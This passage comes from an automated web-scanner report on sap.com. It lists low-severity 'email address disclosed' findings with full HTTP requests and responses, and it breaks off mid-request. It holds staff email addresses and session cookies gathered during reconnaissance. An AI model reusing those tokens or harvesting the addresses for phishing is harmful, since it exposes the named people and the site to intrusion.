<a href="mailto:webmaster@sap.com">webmaster@SAP.com</a>
...[SNIP]...
<a href="mailto:webmaster@sap.com">webmaster@sap.com</a>
...[SNIP]...
19.20. http://www.sap.com/about-sap/events/worldtour/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /about-sap/events/worldtour/index.epx

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sap/events/worldtour/index.epx HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sap.com/about-sap/events/worldtour/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:25:22 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:25:22 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:25:22 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:25:23 GMT
Content-Length: 42136


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<a href="mailto:sap.tour@sap.com">
...[SNIP]...
19.21. http://www.sap.com/news-reader/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /news-reader/index.epx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /news-reader/index.epx?articleID=17603&_=1318690575808 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/index.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=check#true#1318690607|session#1318690546019-990768#1318692407

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:55 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:55 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:01:55 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:55 GMT
Content-Length: 50791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
<a href="mailto:christoph.liedtke@sap.com">christoph.liedtke@sap.com</a>
...[SNIP]...
<a href="mailto:hubertus.kuelps@sap.com">hubertus.kuelps@sap.com</a>
...[SNIP]...
<a href="mailto:james.dever@sap.com">james.dever@sap.com</a>
...[SNIP]...
<a href="mailto:lynn.ong@sap.com">lynn.ong@sap.com</a>
...[SNIP]...
<a href="mailto:investor@sap.com">investor@sap.com</a>
...[SNIP]...
19.22. http://www.sap.com/news-reader/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /news-reader/index.epx

Issue detail

The following email address was disclosed in the response:

Request

GET /news-reader/index.epx?category=ALL&articleID=17578&page=1&pageSize=10&_=1318690583286 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-SAP-Referer: http://www.sap.com/news-reader/?articleID=17603
Referer: http://www.sap.com/index.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=check#true#1318690607|session#1318690546019-990768#1318692407

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:34 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:34 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|INDUSTRY=INDA000003,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:34 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:34 GMT
Content-Length: 33126


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
<A HREF="mailto:dorit.shackleton@sap.com" target=_blank>dorit.shackleton@sap.com</A>
...[SNIP]...
19.23. http://www.sap.com/partners/partnerwithsap/business-objects-crystal/north-american-resellers.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /partners/partnerwithsap/business-objects-crystal/north-american-resellers.epx

Issue detail

The following email address was disclosed in the response:

Request

GET /partners/partnerwithsap/business-objects-crystal/north-american-resellers.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42472
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:27 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:27 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:27 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<a href="mailto: volumesales@sap.com">
...[SNIP]...
19.24. http://www.sap.com/sme/howtobuy/solution_adviser.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/howtobuy/solution_adviser.epx

Issue detail

The following email address was disclosed in the response:

Request

GET /sme/howtobuy/solution_adviser.epx HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/sme/solutions/businessmanagement/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fwlg%2f26917; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:29:25 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:29:25 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:29:24 GMT
Content-Length: 48825


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
<a href="mailto:webmaster@sap.com?subject=Questions%20or%20Comments%20About%20SAP.com">webmaster@sap.com</a>
...[SNIP]...
19.25. http://www.sap.com/sme/partners/findpartner/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/partners/findpartner/index.epx

Issue detail

The following email address was disclosed in the response:

Request

GET /sme/partners/findpartner/index.epx HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; mbox=session#1318688512533-813903#1318690682|check#true#1318688882

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:27:02 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:27:02 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:27:02 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:27:02 GMT
Content-Length: 50382


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
<a href="mailto:webmaster@sap.com?subject=Questions%20or%20Comments%20About%20SAP.com">webmaster@sap.com</a>
...[SNIP]...
19.26. http://www.sap.com/sme/search/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/search/index.epx

Issue detail

The following email address was disclosed in the response:

Request

GET /sme/search/index.epx?q1=xss+sqli+httpi+111+222+333+444+555 HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/sme/partners/findpartner/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fwlg%2f26917; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:28:18 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:28:18 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:28:18 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:28:18 GMT
Content-Length: 47227


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
<a href="mailto:webmaster@sap.com?subject=Questions%20or%20Comments%20About%20SAP.com">webmaster@sap.com</a>
...[SNIP]...
19.27. http://www.sap.com/sme/seeitinaction/customerreferences.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/seeitinaction/customerreferences.epx

Issue detail

The following email address was disclosed in the response:

Request

GET /sme/seeitinaction/customerreferences.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 76575
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:26 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:26 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
<a href="mailto:webmaster@sap.com?subject=Questions%20or%20Comments%20About%20SAP.com">webmaster@sap.com</a>
...[SNIP]...
19.28. http://www.sap.com/sme/seeitinaction/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/seeitinaction/index.epx

Issue detail

The following email address was disclosed in the response:

Request

GET /sme/seeitinaction/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 54470
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:13 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:13 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:03:13 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
<a href="mailto:webmaster@sap.com?subject=Questions%20or%20Comments%20About%20SAP.com">webmaster@sap.com</a>
...[SNIP]...
19.29. http://www.sap.com/sme/seeitinaction/overviewvideos.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/seeitinaction/overviewvideos.epx

Issue detail

The following email address was disclosed in the response:

Request

GET /sme/seeitinaction/overviewvideos.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 85841
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:19 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:19 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
<a href="mailto:webmaster@sap.com?subject=Questions%20or%20Comments%20About%20SAP.com">webmaster@sap.com</a>
...[SNIP]...
19.30. http://www.sap.com/sme/seeitinaction/seealldemos.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/seeitinaction/seealldemos.epx

Issue detail

The following email address was disclosed in the response:

Request

GET /sme/seeitinaction/seealldemos.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 86391
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:16 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:16 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
<a href="mailto:webmaster@sap.com?subject=Questions%20or%20Comments%20About%20SAP.com">webmaster@sap.com</a>
...[SNIP]...
19.31. http://www.sap.com/sme/seeitinaction/solutiondemos.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/seeitinaction/solutiondemos.epx

Issue detail

The following email address was disclosed in the response:

Request

GET /sme/seeitinaction/solutiondemos.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 65712
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:21 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:21 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
<a href="mailto:webmaster@sap.com?subject=Questions%20or%20Comments%20About%20SAP.com">webmaster@sap.com</a>
...[SNIP]...
19.32. http://www.sap.com/sme/solutions/businessmanagement/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/solutions/businessmanagement/index.epx

Issue detail

The following email address was disclosed in the response:

Request

GET /sme/solutions/businessmanagement/index.epx HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
